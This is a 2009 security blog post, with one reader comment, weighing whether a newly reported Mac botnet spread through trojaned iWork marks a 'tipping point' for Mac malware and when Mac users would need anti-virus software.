« 85% to 95% of all e-mail is spam? Yeah, that makes sense. | Main | Breaking down the "electric grid is vulnerable" stories. »

Have we reached the Mac Malware tipping point yet? Eh... maybe?

The technical media is all a twitter over what appears to be the emergence of the first mac botnet. The infector appears to be an updated version of a trojaned version of iWork that popped up earlier this year. Anyone who has worked as a Windows virus analyst would scoff at the relatively unsophistication exhibited by the malware, but nevertheless, it is a piece of malware, and it is out there. I wanted to take this opportunity to answer some of the most common questions people have about mac malware.

Does this mean that Mac users should rush to buy anti-virus software and expect their machines to end up as compromised as a PC? Probably not, but soon. For now, as long as you aren't downloading pirated software you are safe.

Does this mean mac malware is going to become endemic? Yes. If no one is running anti-virus, then there is nothing to clean up infected systems beyond end-of-life hardware replacement. Given the state of the economy and mac hardware longevity, that can take a very long time.

Does this mean we hit the mac malware tipping point? That I don't know. We can't say that we have reached the mac malware tipping point unless we come up with a definition for the tipping point itself. Dino Dai Zovi and I have been kicking around a potential "warning sign" that, when seen, indicates we are now in the mac malware epidemic state. Our current preferred indicator is the emergence of websites that perform drive-by exploits of the browser to install botnet-controllable malware, regardless if the exploit is a zero-day attack or not. In other words, when we see what happens every day on the PC side happen once on the Mac side, then we all need to run out and buy anti-virus software.

Some time ago you predicted that mac malware would hit its tipping point at 15%. Does this mean you are wrong? Well, my prediction was based on the difficulty to attack a PC versus the market share of a Mac. I assumed that the difficult of attacking a PC was strictly defined by the effectiveness of current anti-virus products on a new piece of malware. My back-of-the-envelope estimate put an attacker's success rate at compromising a PC at around 20%, which meant that Macs would have to around 16% market share before they attract the attention of serious malware authors. If the real success rate of an attacker is lower, then you should expect a mac malware epidemic far earlier. So the answer is: maybe I'm wrong, but I don't know yet.

In short, the story for mac malware hasn't changed this week contrary to popular opinion. However, as both users and as information security professionals, we need to remain vigilant and watch for the tipping point in mac malware, and use that as the trigger to install Mac AV software.

Comments (1)

"In other words, when we see what happens every day on the PC side happen once on the Mac side, then we all need to run out and buy anti-virus software."

websites pushing a mac port of the zlob trojan are over a year old... it's not a botnet per se (it's a downloader, but as conficker shows downloaders can also be botnets if the target payload is just right), and it's not a drive-by-download (rather, it's the fake codec ruse), but it is something that we see happen on the pc side every day (the zlob gang were pros, and reasonably successful ones at that)... the mac version even had rudimentary server-side polymorphism, as the dmg file had a different hash depending on the ip address of the recipient (so scanners that couldn't look at the contents of the dmg envelope would be SOL)...

Post a comment

(If you haven't left a comment here before, you may need to be approved by the site owner before your comment will appear. Until then, it won't appear on the entry. Thanks for waiting.)


This page contains a single entry from the blog posted on April 19, 2009 7:18 PM.

The previous post in this blog was 85% to 95% of all e-mail is spam? Yeah, that makes sense..

The next post in this blog is Breaking down the "electric grid is vulnerable" stories..

Many more can be found on the main index page or by looking through the archives.

Powered by
Movable Type 3.33